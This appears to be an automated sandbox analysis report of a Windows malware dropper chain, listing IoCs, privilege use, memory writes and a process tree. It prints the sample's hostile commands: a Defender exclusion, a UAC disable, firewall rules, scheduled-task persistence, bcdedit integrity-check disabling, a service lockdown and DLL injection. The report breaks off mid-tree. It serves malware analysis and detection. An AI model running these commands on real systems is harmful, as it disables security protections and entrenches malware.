Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	regasm.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
2760	amert.exe
1256	explorha.exe
2468	chrome.exe
2468	chrome.exe
2364	powershell.exe
3268	rundll32.exe
3268	rundll32.exe
3268	rundll32.exe
3268	rundll32.exe
3268	rundll32.exe
3268	rundll32.exe
3156	u1jo.0.exe
3156	u1jo.0.exe
3156	u1jo.0.exe
3268	rundll32.exe
3268	rundll32.exe
3268	rundll32.exe
3268	rundll32.exe
3268	rundll32.exe
3268	rundll32.exe
3704	powershell.exe
2872	jok.exe
3156	u1jo.0.exe
3156	u1jo.0.exe
3156	u1jo.0.exe

Suspicious use of AdjustPrivilegeToken 47 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeDebugPrivilege	2088	file300un.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeDebugPrivilege	3036	regasm.exe
Token: SeDebugPrivilege	2364	powershell.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeDebugPrivilege	3704	powershell.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeDebugPrivilege	2872	jok.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe
Token: SeShutdownPrivilege	2468	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2084	98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe
2760	amert.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
4000	u1jo.1.exe
4000	u1jo.1.exe
4000	u1jo.1.exe
4000	u1jo.1.exe
4000	u1jo.1.exe
4000	u1jo.1.exe
4000	u1jo.1.exe

Suspicious use of SendNotifyMessage 63 IoCs

pid	Process
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2468	chrome.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
4000	u1jo.1.exe
4000	u1jo.1.exe
4000	u1jo.1.exe
4000	u1jo.1.exe
4000	u1jo.1.exe
4000	u1jo.1.exe
4000	u1jo.1.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe
2572	bcaa5b1d77.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2084 wrote to memory of 2604	2084	98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe	28
PID 2084 wrote to memory of 2604	2084	98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe	28
PID 2084 wrote to memory of 2604	2084	98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe	28
PID 2084 wrote to memory of 2604	2084	98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe	28
PID 2604 wrote to memory of 2972	2604	explorta.exe	30
PID 2604 wrote to memory of 2972	2604	explorta.exe	30
PID 2604 wrote to memory of 2972	2604	explorta.exe	30
PID 2604 wrote to memory of 2972	2604	explorta.exe	30
PID 2604 wrote to memory of 2760	2604	explorta.exe	31
PID 2604 wrote to memory of 2760	2604	explorta.exe	31
PID 2604 wrote to memory of 2760	2604	explorta.exe	31
PID 2604 wrote to memory of 2760	2604	explorta.exe	31
PID 2760 wrote to memory of 1256	2760	amert.exe	32
PID 2760 wrote to memory of 1256	2760	amert.exe	32
PID 2760 wrote to memory of 1256	2760	amert.exe	32
PID 2760 wrote to memory of 1256	2760	amert.exe	32
PID 1256 wrote to memory of 2780	1256	explorha.exe	33
PID 1256 wrote to memory of 2780	1256	explorha.exe	33
PID 1256 wrote to memory of 2780	1256	explorha.exe	33
PID 1256 wrote to memory of 2780	1256	explorha.exe	33
PID 1256 wrote to memory of 2780	1256	explorha.exe	33
PID 1256 wrote to memory of 2780	1256	explorha.exe	33
PID 1256 wrote to memory of 2780	1256	explorha.exe	33
PID 2780 wrote to memory of 764	2780	swiiiii.exe	35
PID 2780 wrote to memory of 764	2780	swiiiii.exe	35
PID 2780 wrote to memory of 764	2780	swiiiii.exe	35
PID 2780 wrote to memory of 764	2780	swiiiii.exe	35
PID 2780 wrote to memory of 764	2780	swiiiii.exe	35
PID 2780 wrote to memory of 764	2780	swiiiii.exe	35
PID 2780 wrote to memory of 764	2780	swiiiii.exe	35
PID 2780 wrote to memory of 988	2780	swiiiii.exe	36
PID 2780 wrote to memory of 988	2780	swiiiii.exe	36
PID 2780 wrote to memory of 988	2780	swiiiii.exe	36
PID 2780 wrote to memory of 988	2780	swiiiii.exe	36
PID 2780 wrote to memory of 988	2780	swiiiii.exe	36
PID 2780 wrote to memory of 988	2780	swiiiii.exe	36
PID 2780 wrote to memory of 988	2780	swiiiii.exe	36
PID 2780 wrote to memory of 988	2780	swiiiii.exe	36
PID 2780 wrote to memory of 988	2780	swiiiii.exe	36
PID 2780 wrote to memory of 988	2780	swiiiii.exe	36
PID 2780 wrote to memory of 988	2780	swiiiii.exe	36
PID 2780 wrote to memory of 988	2780	swiiiii.exe	36
PID 2780 wrote to memory of 988	2780	swiiiii.exe	36
PID 988 wrote to memory of 1800	988	RegAsm.exe	37
PID 988 wrote to memory of 1800	988	RegAsm.exe	37
PID 988 wrote to memory of 1800	988	RegAsm.exe	37
PID 988 wrote to memory of 1800	988	RegAsm.exe	37
PID 2780 wrote to memory of 632	2780	swiiiii.exe	38
PID 2780 wrote to memory of 632	2780	swiiiii.exe	38
PID 2780 wrote to memory of 632	2780	swiiiii.exe	38
PID 2780 wrote to memory of 632	2780	swiiiii.exe	38
PID 2604 wrote to memory of 1948	2604	explorta.exe	39
PID 2604 wrote to memory of 1948	2604	explorta.exe	39
PID 2604 wrote to memory of 1948	2604	explorta.exe	39
PID 2604 wrote to memory of 1948	2604	explorta.exe	39
PID 1256 wrote to memory of 2872	1256	explorha.exe	40
PID 1256 wrote to memory of 2872	1256	explorha.exe	40
PID 1256 wrote to memory of 2872	1256	explorha.exe	40
PID 1256 wrote to memory of 2872	1256	explorha.exe	40
PID 1256 wrote to memory of 3008	1256	explorha.exe	203
PID 1256 wrote to memory of 3008	1256	explorha.exe	203
PID 1256 wrote to memory of 3008	1256	explorha.exe	203
PID 1256 wrote to memory of 3008	1256	explorha.exe	203
PID 3008 wrote to memory of 1640	3008	swiiii.exe	45

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

C:\Users\Admin\AppData\Local\Temp\98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe
"C:\Users\Admin\AppData\Local\Temp\98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2084
- C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
  "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of WriteProcessMemory
  PID:2604
- - C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
    "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
    3⤵
    PID:2972
- - C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe
    "C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2760
  - - C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
      "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1256
    - - C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2780
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:764
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:988
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 988 -s 256
        7⤵
        Program crash
        
        PID:1800
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 560
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:632
    - - C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe"
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2872
    - - C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3008
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:1640
    - - C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"
        5⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:2088
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe" -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2364
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
        6⤵
        Drops startup file
        Loads dropped DLL
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:3036
        
        C:\Users\Admin\Pictures\Xe7EjKVAqAMRHsbNmIAyvjKY.exe
        
        "C:\Users\Admin\Pictures\Xe7EjKVAqAMRHsbNmIAyvjKY.exe"
        7⤵
        Blocklisted process makes network request
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2004
        
        C:\Users\Admin\AppData\Local\Temp\u1jo.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u1jo.0.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:3156
        
        C:\Users\Admin\AppData\Local\Temp\u1jo.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u1jo.1.exe"
        8⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4000
        
        C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        9⤵
        
        PID:3428
        
        C:\Users\Admin\Pictures\d0KivyMFNNmcnXIqPmyGk9JJ.exe
        
        "C:\Users\Admin\Pictures\d0KivyMFNNmcnXIqPmyGk9JJ.exe"
        7⤵
        Executes dropped EXE
        
        PID:2852
        
        C:\Users\Admin\Pictures\d0KivyMFNNmcnXIqPmyGk9JJ.exe
        
        "C:\Users\Admin\Pictures\d0KivyMFNNmcnXIqPmyGk9JJ.exe"
        8⤵
        
        PID:1944
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:1568
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:3712
        
        C:\Users\Admin\Pictures\jSufjXRDasGbzBaPXI4Wjkit.exe
        
        "C:\Users\Admin\Pictures\jSufjXRDasGbzBaPXI4Wjkit.exe"
        7⤵
        Executes dropped EXE
        
        PID:2448
        
        C:\Users\Admin\Pictures\jSufjXRDasGbzBaPXI4Wjkit.exe
        
        "C:\Users\Admin\Pictures\jSufjXRDasGbzBaPXI4Wjkit.exe"
        8⤵
        
        PID:788
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:3436
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:2128
        
        C:\Users\Admin\Pictures\Nll8iSM3Es6hQuUFVGdpDLKp.exe
        
        "C:\Users\Admin\Pictures\Nll8iSM3Es6hQuUFVGdpDLKp.exe"
        7⤵
        Executes dropped EXE
        
        PID:268
        
        C:\Users\Admin\Pictures\Nll8iSM3Es6hQuUFVGdpDLKp.exe
        
        "C:\Users\Admin\Pictures\Nll8iSM3Es6hQuUFVGdpDLKp.exe"
        8⤵
        
        PID:2876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:1576
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:916
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        9⤵
        
        PID:4000
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        10⤵
        Creates scheduled task(s)
        
        PID:3876
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        10⤵
        
        PID:3360
        
        C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        10⤵
        
        PID:2020
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:1120
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:1404
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:3020
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:2508
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:2240
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:2980
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:1632
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:3276
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:1708
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:1460
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:832
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:2284
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:3532
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        10⤵
        
        PID:932
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        10⤵
        Modifies boot configuration data using bcdedit
        
        PID:3268
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        10⤵
        
        PID:1620
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        10⤵
        Creates scheduled task(s)
        
        PID:1796
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        10⤵
        
        PID:3620
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        11⤵
        
        PID:2548
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        12⤵
        Launches sc.exe
        
        PID:3680
        
        C:\Users\Admin\Pictures\qC1NgtgLPRjIDtSFdVkXHXB8.exe
        
        "C:\Users\Admin\Pictures\qC1NgtgLPRjIDtSFdVkXHXB8.exe"
        7⤵
        Executes dropped EXE
        
        PID:3080
        
        C:\Users\Admin\Pictures\qC1NgtgLPRjIDtSFdVkXHXB8.exe
        
        "C:\Users\Admin\Pictures\qC1NgtgLPRjIDtSFdVkXHXB8.exe"
        8⤵
        
        PID:1796
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:1288
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:2892
        
        C:\Users\Admin\Pictures\z278k3sED2oaPPuKC1qIfUPJ.exe
        
        "C:\Users\Admin\Pictures\z278k3sED2oaPPuKC1qIfUPJ.exe"
        7⤵
        Modifies firewall policy service
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2540
        
        C:\Users\Admin\Pictures\Ki9uLqg9jS1UxJFc7oOmpqTm.exe
        
        "C:\Users\Admin\Pictures\Ki9uLqg9jS1UxJFc7oOmpqTm.exe"
        7⤵
        Executes dropped EXE
        
        PID:1572
        
        C:\Users\Admin\AppData\Local\Temp\7zSF99B.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        8⤵
        Executes dropped EXE
        
        PID:3756
        
        C:\Windows\SysWOW64\cmd.exe
        
